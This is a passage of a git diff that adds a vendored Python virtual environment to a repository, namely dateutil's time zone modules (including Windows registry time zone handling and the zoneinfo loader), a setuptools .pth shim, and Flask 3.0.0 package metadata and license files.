dt.tzinfo + + # If a time zone defines its own "is_ambiguous" function, we'll use that. + is_ambiguous_fn = getattr(tz, 'is_ambiguous', None) + if is_ambiguous_fn is not None: + try: + return tz.is_ambiguous(dt) + except Exception: + pass + + # If it doesn't come out and tell us it's ambiguous, we'll just check if + # the fold attribute has any effect on this particular date and time. + dt = dt.replace(tzinfo=tz) + wall_0 = enfold(dt, fold=0) + wall_1 = enfold(dt, fold=1) + + same_offset = wall_0.utcoffset() == wall_1.utcoffset() + same_dst = wall_0.dst() == wall_1.dst() + + return not (same_offset and same_dst) + + +def resolve_imaginary(dt): + """ + Given a datetime that may be imaginary, return an existing datetime. + + This function assumes that an imaginary datetime represents what the + wall time would be in a zone had the offset transition not occurred, so + it will always fall forward by the transition's change in offset. + + .. doctest:: + + >>> from dateutil import tz + >>> from datetime import datetime + >>> NYC = tz.gettz('America/New_York') + >>> print(tz.resolve_imaginary(datetime(2017, 3, 12, 2, 30, tzinfo=NYC))) + 2017-03-12 03:30:00-04:00 + + >>> KIR = tz.gettz('Pacific/Kiritimati') + >>> print(tz.resolve_imaginary(datetime(1995, 1, 1, 12, 30, tzinfo=KIR))) + 1995-01-02 12:30:00+14:00 + + As a note, :func:`datetime.astimezone` is guaranteed to produce a valid, + existing datetime, so a round-trip to and from UTC is sufficient to get + an extant datetime, however, this generally "falls back" to an earlier time + rather than falling forward to the STD side (though no guarantees are made + about this behavior). + + :param dt: + A :class:`datetime.datetime` which may or may not exist. + + :return: + Returns an existing :class:`datetime.datetime`. If ``dt`` was not + imaginary, the datetime returned is guaranteed to be the same object + passed to the function. + + .. 
versionadded:: 2.7.0 + """ + if dt.tzinfo is not None and not datetime_exists(dt): + + curr_offset = (dt + datetime.timedelta(hours=24)).utcoffset() + old_offset = (dt - datetime.timedelta(hours=24)).utcoffset() + + dt += curr_offset - old_offset + + return dt + + +def _datetime_to_timestamp(dt): + """ + Convert a :class:`datetime.datetime` object to an epoch timestamp in + seconds since January 1, 1970, ignoring the time zone. + """ + return (dt.replace(tzinfo=None) - EPOCH).total_seconds() + + +if sys.version_info >= (3, 6): + def _get_supported_offset(second_offset): + return second_offset +else: + def _get_supported_offset(second_offset): + # For python pre-3.6, round to full-minutes if that's not the case. + # Python's datetime doesn't accept sub-minute timezones. Check + # http://python.org/sf/1447945 or https://bugs.python.org/issue5288 + # for some information. + old_offset = second_offset + calculated_offset = 60 * ((second_offset + 30) // 60) + return calculated_offset + + +try: + # Python 3.7 feature + from contextlib import nullcontext as _nullcontext +except ImportError: + class _nullcontext(object): + """ + Class for wrapping contexts so that they are passed through in a + with statement. + """ + def __init__(self, context): + self.context = context + + def __enter__(self): + return self.context + + def __exit__(*args, **kwargs): + pass + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/tz/win.py b/env/Lib/site-packages/dateutil/tz/win.py new file mode 100644 index 00000000..cde07ba7 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/win.py @@ -0,0 +1,370 @@ +# -*- coding: utf-8 -*- +""" +This module provides an interface to the native time zone data on Windows, +including :py:class:`datetime.tzinfo` implementations. + +Attempting to import this module on a non-Windows platform will raise an +:py:obj:`ImportError`. +""" +# This code was originally contributed by Jeffrey Harris. +import datetime +import struct + +from six.moves import winreg +from six import text_type + +try: + import ctypes + from ctypes import wintypes +except ValueError: + # ValueError is raised on non-Windows systems for some horrible reason. + raise ImportError("Running tzwin on non-Windows system") + +from ._common import tzrangebase + +__all__ = ["tzwin", "tzwinlocal", "tzres"] + +ONEWEEK = datetime.timedelta(7) + +TZKEYNAMENT = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones" +TZKEYNAME9X = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Time Zones" +TZLOCALKEYNAME = r"SYSTEM\CurrentControlSet\Control\TimeZoneInformation" + + +def _settzkeyname(): + handle = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) + try: + winreg.OpenKey(handle, TZKEYNAMENT).Close() + TZKEYNAME = TZKEYNAMENT + except WindowsError: + TZKEYNAME = TZKEYNAME9X + handle.Close() + return TZKEYNAME + + +TZKEYNAME = _settzkeyname() + + +class tzres(object): + """ + Class for accessing ``tzres.dll``, which contains timezone name related + resources. + + .. 
versionadded:: 2.5.0 + """ + p_wchar = ctypes.POINTER(wintypes.WCHAR) # Pointer to a wide char + + def __init__(self, tzres_loc='tzres.dll'): + # Load the user32 DLL so we can load strings from tzres + user32 = ctypes.WinDLL('user32') + + # Specify the LoadStringW function + user32.LoadStringW.argtypes = (wintypes.HINSTANCE, + wintypes.UINT, + wintypes.LPWSTR, + ctypes.c_int) + + self.LoadStringW = user32.LoadStringW + self._tzres = ctypes.WinDLL(tzres_loc) + self.tzres_loc = tzres_loc + + def load_name(self, offset): + """ + Load a timezone name from a DLL offset (integer). + + >>> from dateutil.tzwin import tzres + >>> tzr = tzres() + >>> print(tzr.load_name(112)) + 'Eastern Standard Time' + + :param offset: + A positive integer value referring to a string from the tzres dll. + + .. note:: + + Offsets found in the registry are generally of the form + ``@tzres.dll,-114``. The offset in this case is 114, not -114. + + """ + resource = self.p_wchar() + lpBuffer = ctypes.cast(ctypes.byref(resource), wintypes.LPWSTR) + nchar = self.LoadStringW(self._tzres._handle, offset, lpBuffer, 0) + return resource[:nchar] + + def name_from_string(self, tzname_str): + """ + Parse strings as returned from the Windows registry into the time zone + name as defined in the registry. + + >>> from dateutil.tzwin import tzres + >>> tzr = tzres() + >>> print(tzr.name_from_string('@tzres.dll,-251')) + 'Dateline Daylight Time' + >>> print(tzr.name_from_string('Eastern Standard Time')) + 'Eastern Standard Time' + + :param tzname_str: + A timezone name string as returned from a Windows registry key. + + :return: + Returns the localized timezone string from tzres.dll if the string + is of the form `@tzres.dll,-offset`, else returns the input string. + """ + if not tzname_str.startswith('@'): + return tzname_str + + name_splt = tzname_str.split(',-') + try: + offset = int(name_splt[1]) + except: + raise ValueError("Malformed timezone string.") + + return self.load_name(offset) + + +class tzwinbase(tzrangebase): + """tzinfo class based on win32's timezones available in the registry.""" + def __init__(self): + raise NotImplementedError('tzwinbase is an abstract base class') + + def __eq__(self, other): + # Compare on all relevant dimensions, including name. + if not isinstance(other, tzwinbase): + return NotImplemented + + return (self._std_offset == other._std_offset and + self._dst_offset == other._dst_offset and + self._stddayofweek == other._stddayofweek and + self._dstdayofweek == other._dstdayofweek and + self._stdweeknumber == other._stdweeknumber and + self._dstweeknumber == other._dstweeknumber and + self._stdhour == other._stdhour and + self._dsthour == other._dsthour and + self._stdminute == other._stdminute and + self._dstminute == other._dstminute and + self._std_abbr == other._std_abbr and + self._dst_abbr == other._dst_abbr) + + @staticmethod + def list(): + """Return a list of all time zones known to the system.""" + with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as handle: + with winreg.OpenKey(handle, TZKEYNAME) as tzkey: + result = [winreg.EnumKey(tzkey, i) + for i in range(winreg.QueryInfoKey(tzkey)[0])] + return result + + def display(self): + """ + Return the display name of the time zone. + """ + return self._display + + def transitions(self, year): + """ + For a given year, get the DST on and off transition times, expressed + always on the standard time side. For zones with no transitions, this + function returns ``None``. 
+ + :param year: + The year whose transitions you would like to query. + + :return: + Returns a :class:`tuple` of :class:`datetime.datetime` objects, + ``(dston, dstoff)`` for zones with an annual DST transition, or + ``None`` for fixed offset zones. + """ + + if not self.hasdst: + return None + + dston = picknthweekday(year, self._dstmonth, self._dstdayofweek, + self._dsthour, self._dstminute, + self._dstweeknumber) + + dstoff = picknthweekday(year, self._stdmonth, self._stddayofweek, + self._stdhour, self._stdminute, + self._stdweeknumber) + + # Ambiguous dates default to the STD side + dstoff -= self._dst_base_offset + + return dston, dstoff + + def _get_hasdst(self): + return self._dstmonth != 0 + + @property + def _dst_base_offset(self): + return self._dst_base_offset_ + + +class tzwin(tzwinbase): + """ + Time zone object created from the zone info in the Windows registry + + These are similar to :py:class:`dateutil.tz.tzrange` objects in that + the time zone data is provided in the format of a single offset rule + for either 0 or 2 time zone transitions per year. + + :param: name + The name of a Windows time zone key, e.g. "Eastern Standard Time". + The full list of keys can be retrieved with :func:`tzwin.list`. + """ + + def __init__(self, name): + self._name = name + + with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as handle: + tzkeyname = text_type("{kn}\\{name}").format(kn=TZKEYNAME, name=name) + with winreg.OpenKey(handle, tzkeyname) as tzkey: + keydict = valuestodict(tzkey) + + self._std_abbr = keydict["Std"] + self._dst_abbr = keydict["Dlt"] + + self._display = keydict["Display"] + + # See http://ww_winreg.jsiinc.com/SUBA/tip0300/rh0398.htm + tup = struct.unpack("=3l16h", keydict["TZI"]) + stdoffset = -tup[0]-tup[1] # Bias + StandardBias * -1 + dstoffset = stdoffset-tup[2] # + DaylightBias * -1 + self._std_offset = datetime.timedelta(minutes=stdoffset) + self._dst_offset = datetime.timedelta(minutes=dstoffset) + + # for the meaning see the win32 TIME_ZONE_INFORMATION structure docs + # http://msdn.microsoft.com/en-us/library/windows/desktop/ms725481(v=vs.85).aspx + (self._stdmonth, + self._stddayofweek, # Sunday = 0 + self._stdweeknumber, # Last = 5 + self._stdhour, + self._stdminute) = tup[4:9] + + (self._dstmonth, + self._dstdayofweek, # Sunday = 0 + self._dstweeknumber, # Last = 5 + self._dsthour, + self._dstminute) = tup[12:17] + + self._dst_base_offset_ = self._dst_offset - self._std_offset + self.hasdst = self._get_hasdst() + + def __repr__(self): + return "tzwin(%s)" % repr(self._name) + + def __reduce__(self): + return (self.__class__, (self._name,)) + + +class tzwinlocal(tzwinbase): + """ + Class representing the local time zone information in the Windows registry + + While :class:`dateutil.tz.tzlocal` makes system calls (via the :mod:`time` + module) to retrieve time zone information, ``tzwinlocal`` retrieves the + rules directly from the Windows registry and creates an object like + :class:`dateutil.tz.tzwin`. + + Because Windows does not have an equivalent of :func:`time.tzset`, on + Windows, :class:`dateutil.tz.tzlocal` instances will always reflect the + time zone settings *at the time that the process was started*, meaning + changes to the machine's time zone settings during the run of a program + on Windows will **not** be reflected by :class:`dateutil.tz.tzlocal`. + Because ``tzwinlocal`` reads the registry directly, it is unaffected by + this issue. 
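As a rough, illustrative sketch (not part of the vendored file, and only meaningful on a Windows host), the registry-backed classes above can be exercised through the small query surface they expose — ``tzwin.list()``, ``display()`` and ``transitions()``. ``"Eastern Standard Time"`` is used purely because the docstring above cites it as an example key:

.. code-block:: python

    from dateutil.tz.win import tzwin, tzwinlocal

    # Zone keys known to this machine's registry.
    names = tzwin.list()

    # Build a zone from one of those keys and inspect its DST rules.
    eastern = tzwin("Eastern Standard Time")
    print(eastern.display())           # localized display string from the registry
    print(eastern.transitions(2024))   # (dston, dstoff) datetimes, or None for fixed zones

    # The machine's currently configured zone, read directly from the registry.
    print(tzwinlocal())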
+ """ + def __init__(self): + with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as handle: + with winreg.OpenKey(handle, TZLOCALKEYNAME) as tzlocalkey: + keydict = valuestodict(tzlocalkey) + + self._std_abbr = keydict["StandardName"] + self._dst_abbr = keydict["DaylightName"] + + try: + tzkeyname = text_type('{kn}\\{sn}').format(kn=TZKEYNAME, + sn=self._std_abbr) + with winreg.OpenKey(handle, tzkeyname) as tzkey: + _keydict = valuestodict(tzkey) + self._display = _keydict["Display"] + except OSError: + self._display = None + + stdoffset = -keydict["Bias"]-keydict["StandardBias"] + dstoffset = stdoffset-keydict["DaylightBias"] + + self._std_offset = datetime.timedelta(minutes=stdoffset) + self._dst_offset = datetime.timedelta(minutes=dstoffset) + + # For reasons unclear, in this particular key, the day of week has been + # moved to the END of the SYSTEMTIME structure. + tup = struct.unpack("=8h", keydict["StandardStart"]) + + (self._stdmonth, + self._stdweeknumber, # Last = 5 + self._stdhour, + self._stdminute) = tup[1:5] + + self._stddayofweek = tup[7] + + tup = struct.unpack("=8h", keydict["DaylightStart"]) + + (self._dstmonth, + self._dstweeknumber, # Last = 5 + self._dsthour, + self._dstminute) = tup[1:5] + + self._dstdayofweek = tup[7] + + self._dst_base_offset_ = self._dst_offset - self._std_offset + self.hasdst = self._get_hasdst() + + def __repr__(self): + return "tzwinlocal()" + + def __str__(self): + # str will return the standard name, not the daylight name. + return "tzwinlocal(%s)" % repr(self._std_abbr) + + def __reduce__(self): + return (self.__class__, ()) + + +def picknthweekday(year, month, dayofweek, hour, minute, whichweek): + """ dayofweek == 0 means Sunday, whichweek 5 means last instance """ + first = datetime.datetime(year, month, 1, hour, minute) + + # This will work if dayofweek is ISO weekday (1-7) or Microsoft-style (0-6), + # Because 7 % 7 = 0 + weekdayone = first.replace(day=((dayofweek - first.isoweekday()) % 7) + 1) + wd = weekdayone + ((whichweek - 1) * ONEWEEK) + if (wd.month != month): + wd -= ONEWEEK + + return wd + + +def valuestodict(key): + """Convert a registry key's values to a dictionary.""" + dout = {} + size = winreg.QueryInfoKey(key)[1] + tz_res = None + + for i in range(size): + key_name, value, dtype = winreg.EnumValue(key, i) + if dtype == winreg.REG_DWORD or dtype == winreg.REG_DWORD_LITTLE_ENDIAN: + # If it's a DWORD (32-bit integer), it's stored as unsigned - convert + # that to a proper signed integer + if value & (1 << 31): + value = value - (1 << 32) + elif dtype == winreg.REG_SZ: + # If it's a reference to the tzres DLL, load the actual string + if value.startswith('@tzres'): + tz_res = tz_res or tzres() + value = tz_res.name_from_string(value) + + value = value.rstrip('\x00') # Remove trailing nulls + + dout[key_name] = value + + return dout diff --git a/env/Lib/site-packages/dateutil/tzwin.py b/env/Lib/site-packages/dateutil/tzwin.py new file mode 100644 index 00000000..cebc673e --- /dev/null +++ b/env/Lib/site-packages/dateutil/tzwin.py @@ -0,0 +1,2 @@ +# tzwin has moved to dateutil.tz.win +from .tz.win import * diff --git a/env/Lib/site-packages/dateutil/utils.py b/env/Lib/site-packages/dateutil/utils.py new file mode 100644 index 00000000..dd2d245a --- /dev/null +++ b/env/Lib/site-packages/dateutil/utils.py @@ -0,0 +1,71 @@ +# -*- coding: utf-8 -*- +""" +This module offers general convenience and utility functions for dealing with +datetimes. + +.. 
versionadded:: 2.7.0 +""" +from __future__ import unicode_literals + +from datetime import datetime, time + + +def today(tzinfo=None): + """ + Returns a :py:class:`datetime` representing the current day at midnight + + :param tzinfo: + The time zone to attach (also used to determine the current day). + + :return: + A :py:class:`datetime.datetime` object representing the current day + at midnight. + """ + + dt = datetime.now(tzinfo) + return datetime.combine(dt.date(), time(0, tzinfo=tzinfo)) + + +def default_tzinfo(dt, tzinfo): + """ + Sets the ``tzinfo`` parameter on naive datetimes only + + This is useful for example when you are provided a datetime that may have + either an implicit or explicit time zone, such as when parsing a time zone + string. + + .. doctest:: + + >>> from dateutil.tz import tzoffset + >>> from dateutil.parser import parse + >>> from dateutil.utils import default_tzinfo + >>> dflt_tz = tzoffset("EST", -18000) + >>> print(default_tzinfo(parse('2014-01-01 12:30 UTC'), dflt_tz)) + 2014-01-01 12:30:00+00:00 + >>> print(default_tzinfo(parse('2014-01-01 12:30'), dflt_tz)) + 2014-01-01 12:30:00-05:00 + + :param dt: + The datetime on which to replace the time zone + + :param tzinfo: + The :py:class:`datetime.tzinfo` subclass instance to assign to + ``dt`` if (and only if) it is naive. + + :return: + Returns an aware :py:class:`datetime.datetime`. + """ + if dt.tzinfo is not None: + return dt + else: + return dt.replace(tzinfo=tzinfo) + + +def within_delta(dt1, dt2, delta): + """ + Useful for comparing two datetimes that may have a negligible difference + to be considered equal. + """ + delta = abs(delta) + difference = dt1 - dt2 + return -delta <= difference <= delta diff --git a/env/Lib/site-packages/dateutil/zoneinfo/__init__.py b/env/Lib/site-packages/dateutil/zoneinfo/__init__.py new file mode 100644 index 00000000..34f11ad6 --- /dev/null +++ b/env/Lib/site-packages/dateutil/zoneinfo/__init__.py @@ -0,0 +1,167 @@ +# -*- coding: utf-8 -*- +import warnings +import json + +from tarfile import TarFile +from pkgutil import get_data +from io import BytesIO + +from dateutil.tz import tzfile as _tzfile + +__all__ = ["get_zonefile_instance", "gettz", "gettz_db_metadata"] + +ZONEFILENAME = "dateutil-zoneinfo.tar.gz" +METADATA_FN = 'METADATA' + + +class tzfile(_tzfile): + def __reduce__(self): + return (gettz, (self._filename,)) + + +def getzoneinfofile_stream(): + try: + return BytesIO(get_data(__name__, ZONEFILENAME)) + except IOError as e: # TODO switch to FileNotFoundError? + warnings.warn("I/O error({0}): {1}".format(e.errno, e.strerror)) + return None + + +class ZoneInfoFile(object): + def __init__(self, zonefile_stream=None): + if zonefile_stream is not None: + with TarFile.open(fileobj=zonefile_stream) as tf: + self.zones = {zf.name: tzfile(tf.extractfile(zf), filename=zf.name) + for zf in tf.getmembers() + if zf.isfile() and zf.name != METADATA_FN} + # deal with links: They'll point to their parent object. Less + # waste of memory + links = {zl.name: self.zones[zl.linkname] + for zl in tf.getmembers() if + zl.islnk() or zl.issym()} + self.zones.update(links) + try: + metadata_json = tf.extractfile(tf.getmember(METADATA_FN)) + metadata_str = metadata_json.read().decode('UTF-8') + self.metadata = json.loads(metadata_str) + except KeyError: + # no metadata in tar file + self.metadata = None + else: + self.zones = {} + self.metadata = None + + def get(self, name, default=None): + """ + Wrapper for :func:`ZoneInfoFile.zones.get`. 
This is a convenience method + for retrieving zones from the zone dictionary. + + :param name: + The name of the zone to retrieve. (Generally IANA zone names) + + :param default: + The value to return in the event of a missing key. + + .. versionadded:: 2.6.0 + + """ + return self.zones.get(name, default) + + +# The current API has gettz as a module function, although in fact it taps into +# a stateful class. So as a workaround for now, without changing the API, we +# will create a new "global" class instance the first time a user requests a +# timezone. Ugly, but adheres to the api. +# +# TODO: Remove after deprecation period. +_CLASS_ZONE_INSTANCE = [] + + +def get_zonefile_instance(new_instance=False): + """ + This is a convenience function which provides a :class:`ZoneInfoFile` + instance using the data provided by the ``dateutil`` package. By default, it + caches a single instance of the ZoneInfoFile object and returns that. + + :param new_instance: + If ``True``, a new instance of :class:`ZoneInfoFile` is instantiated and + used as the cached instance for the next call. Otherwise, new instances + are created only as necessary. + + :return: + Returns a :class:`ZoneInfoFile` object. + + .. versionadded:: 2.6 + """ + if new_instance: + zif = None + else: + zif = getattr(get_zonefile_instance, '_cached_instance', None) + + if zif is None: + zif = ZoneInfoFile(getzoneinfofile_stream()) + + get_zonefile_instance._cached_instance = zif + + return zif + + +def gettz(name): + """ + This retrieves a time zone from the local zoneinfo tarball that is packaged + with dateutil. + + :param name: + An IANA-style time zone name, as found in the zoneinfo file. + + :return: + Returns a :class:`dateutil.tz.tzfile` time zone object. + + .. warning:: + It is generally inadvisable to use this function, and it is only + provided for API compatibility with earlier versions. This is *not* + equivalent to ``dateutil.tz.gettz()``, which selects an appropriate + time zone based on the inputs, favoring system zoneinfo. This is ONLY + for accessing the dateutil-specific zoneinfo (which may be out of + date compared to the system zoneinfo). + + .. deprecated:: 2.6 + If you need to use a specific zoneinfofile over the system zoneinfo, + instantiate a :class:`dateutil.zoneinfo.ZoneInfoFile` object and call + :func:`dateutil.zoneinfo.ZoneInfoFile.get(name)` instead. + + Use :func:`get_zonefile_instance` to retrieve an instance of the + dateutil-provided zoneinfo. + """ + warnings.warn("zoneinfo.gettz() will be removed in future versions, " + "to use the dateutil-provided zoneinfo files, instantiate a " + "ZoneInfoFile object and use ZoneInfoFile.zones.get() " + "instead. See the documentation for details.", + DeprecationWarning) + + if len(_CLASS_ZONE_INSTANCE) == 0: + _CLASS_ZONE_INSTANCE.append(ZoneInfoFile(getzoneinfofile_stream())) + return _CLASS_ZONE_INSTANCE[0].zones.get(name) + + +def gettz_db_metadata(): + """ Get the zonefile metadata + + See `zonefile_metadata`_ + + :returns: + A dictionary with the database metadata + + .. deprecated:: 2.6 + See deprecation warning in :func:`zoneinfo.gettz`. To get metadata, + query the attribute ``zoneinfo.ZoneInfoFile.metadata``. + """ + warnings.warn("zoneinfo.gettz_db_metadata() will be removed in future " + "versions, to use the dateutil-provided zoneinfo files, " + "ZoneInfoFile object and query the 'metadata' attribute " + "instead. 
See the documentation for details.", + DeprecationWarning) + + if len(_CLASS_ZONE_INSTANCE) == 0: + _CLASS_ZONE_INSTANCE.append(ZoneInfoFile(getzoneinfofile_stream())) + return _CLASS_ZONE_INSTANCE[0].metadata diff --git a/env/Lib/site-packages/dateutil/zoneinfo/dateutil-zoneinfo.tar.gz b/env/Lib/site-packages/dateutil/zoneinfo/dateutil-zoneinfo.tar.gz new file mode 100644 index 00000000..524c48e1 Binary files /dev/null and b/env/Lib/site-packages/dateutil/zoneinfo/dateutil-zoneinfo.tar.gz differ diff --git a/env/Lib/site-packages/dateutil/zoneinfo/rebuild.py b/env/Lib/site-packages/dateutil/zoneinfo/rebuild.py new file mode 100644 index 00000000..684c6586 --- /dev/null +++ b/env/Lib/site-packages/dateutil/zoneinfo/rebuild.py @@ -0,0 +1,75 @@ +import logging +import os +import tempfile +import shutil +import json +from subprocess import check_call, check_output +from tarfile import TarFile + +from dateutil.zoneinfo import METADATA_FN, ZONEFILENAME + + +def rebuild(filename, tag=None, format="gz", zonegroups=[], metadata=None): + """Rebuild the internal timezone info in dateutil/zoneinfo/zoneinfo*tar* + + filename is the timezone tarball from ``ftp.iana.org/tz``. + + """ + tmpdir = tempfile.mkdtemp() + zonedir = os.path.join(tmpdir, "zoneinfo") + moduledir = os.path.dirname(__file__) + try: + with TarFile.open(filename) as tf: + for name in zonegroups: + tf.extract(name, tmpdir) + filepaths = [os.path.join(tmpdir, n) for n in zonegroups] + + _run_zic(zonedir, filepaths) + + # write metadata file + with open(os.path.join(zonedir, METADATA_FN), 'w') as f: + json.dump(metadata, f, indent=4, sort_keys=True) + target = os.path.join(moduledir, ZONEFILENAME) + with TarFile.open(target, "w:%s" % format) as tf: + for entry in os.listdir(zonedir): + entrypath = os.path.join(zonedir, entry) + tf.add(entrypath, entry) + finally: + shutil.rmtree(tmpdir) + + +def _run_zic(zonedir, filepaths): + """Calls the ``zic`` compiler in a compatible way to get a "fat" binary. + + Recent versions of ``zic`` default to ``-b slim``, while older versions + don't even have the ``-b`` option (but default to "fat" binaries). The + current version of dateutil does not support Version 2+ TZif files, which + causes problems when used in conjunction with "slim" binaries, so this + function is used to ensure that we always get a "fat" binary. + """ + + try: + help_text = check_output(["zic", "--help"]) + except OSError as e: + _print_on_nosuchfile(e) + raise + + if b"-b " in help_text: + bloat_args = ["-b", "fat"] + else: + bloat_args = [] + + check_call(["zic"] + bloat_args + ["-d", zonedir] + filepaths) + + +def _print_on_nosuchfile(e): + """Print helpful troubleshooting message + + e is an exception raised by subprocess.check_call() + + """ + if e.errno == 2: + logging.error( + "Could not find zic. 
Perhaps you need to install " + "libc-bin or some other package that provides it, " + "or it's not in your PATH?") diff --git a/env/Lib/site-packages/distutils-precedence.pth b/env/Lib/site-packages/distutils-precedence.pth new file mode 100644 index 00000000..6de4198f --- /dev/null +++ b/env/Lib/site-packages/distutils-precedence.pth @@ -0,0 +1 @@ +import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'stdlib') == 'local'; enabled and __import__('_distutils_hack').add_shim(); diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/INSTALLER b/env/Lib/site-packages/flask-3.0.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/LICENSE.rst b/env/Lib/site-packages/flask-3.0.0.dist-info/LICENSE.rst new file mode 100644 index 00000000..9d227a0c --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2010 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/METADATA b/env/Lib/site-packages/flask-3.0.0.dist-info/METADATA new file mode 100644 index 00000000..b802e937 --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/METADATA @@ -0,0 +1,116 @@ +Metadata-Version: 2.1 +Name: Flask +Version: 3.0.0 +Summary: A simple framework for building complex web applications. 
+Maintainer-email: Pallets +Requires-Python: >=3.8 +Description-Content-Type: text/x-rst +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Framework :: Flask +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content +Classifier: Topic :: Internet :: WWW/HTTP :: WSGI +Classifier: Topic :: Internet :: WWW/HTTP :: WSGI :: Application +Classifier: Topic :: Software Development :: Libraries :: Application Frameworks +Requires-Dist: Werkzeug>=3.0.0 +Requires-Dist: Jinja2>=3.1.2 +Requires-Dist: itsdangerous>=2.1.2 +Requires-Dist: click>=8.1.3 +Requires-Dist: blinker>=1.6.2 +Requires-Dist: importlib-metadata>=3.6.0; python_version < '3.10' +Requires-Dist: asgiref>=3.2 ; extra == "async" +Requires-Dist: python-dotenv ; extra == "dotenv" +Project-URL: Changes, https://flask.palletsprojects.com/changes/ +Project-URL: Chat, https://discord.gg/pallets +Project-URL: Documentation, https://flask.palletsprojects.com/ +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Issue Tracker, https://github.com/pallets/flask/issues/ +Project-URL: Source Code, https://github.com/pallets/flask/ +Provides-Extra: async +Provides-Extra: dotenv + +Flask +===== + +Flask is a lightweight `WSGI`_ web application framework. It is designed +to make getting started quick and easy, with the ability to scale up to +complex applications. It began as a simple wrapper around `Werkzeug`_ +and `Jinja`_ and has become one of the most popular Python web +application frameworks. + +Flask offers suggestions, but doesn't enforce any dependencies or +project layout. It is up to the developer to choose the tools and +libraries they want to use. There are many extensions provided by the +community that make adding new functionality easy. + +.. _WSGI: https://wsgi.readthedocs.io/ +.. _Werkzeug: https://werkzeug.palletsprojects.com/ +.. _Jinja: https://jinja.palletsprojects.com/ + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + $ pip install -U Flask + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +A Simple Example +---------------- + +.. code-block:: python + + # save this as app.py + from flask import Flask + + app = Flask(__name__) + + @app.route("/") + def hello(): + return "Hello, World!" + +.. code-block:: text + + $ flask run + * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) + + +Contributing +------------ + +For guidance on setting up a development environment and how to make a +contribution to Flask, see the `contributing guidelines`_. + +.. _contributing guidelines: https://github.com/pallets/flask/blob/main/CONTRIBUTING.rst + + +Donate +------ + +The Pallets organization develops and supports Flask and the libraries +it uses. In order to grow the community of contributors and users, and +allow the maintainers to devote more time to the projects, `please +donate today`_. + +.. 
_please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://flask.palletsprojects.com/ +- Changes: https://flask.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/Flask/ +- Source Code: https://github.com/pallets/flask/ +- Issue Tracker: https://github.com/pallets/flask/issues/ +- Chat: https://discord.gg/pallets + diff --git a/env/Lib/site-packages/flask-3.0.0.dist-info/RECORD b/env/Lib/site-packages/flask-3.0.0.dist-info/RECORD new file mode 100644 index 00000000..57f2cf3e --- /dev/null +++ b/env/Lib/site-packages/flask-3.0.0.dist-info/RECORD @@ -0,0 +1,58 @@ +../../Scripts/flask.exe,sha256=WAGVUGNkzglb7Kjx5pR-KpHnvJq3jMk7Uv5d70pN5nM,97161 +flask-3.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +flask-3.0.0.dist-info/LICENSE.rst,sha256=SJqOEQhQntmKN7uYPhHg9-HTHwvY-Zp5yESOf_N9B-o,1475 +flask-3.0.0.dist-info/METADATA,sha256=02XP69VTiwn5blcRgHcyuSQ2cLTuJFV8FXw2x4QnxKo,3588 +flask-3.0.0.dist-info/RECORD,, +flask-3.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +flask-3.0.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81 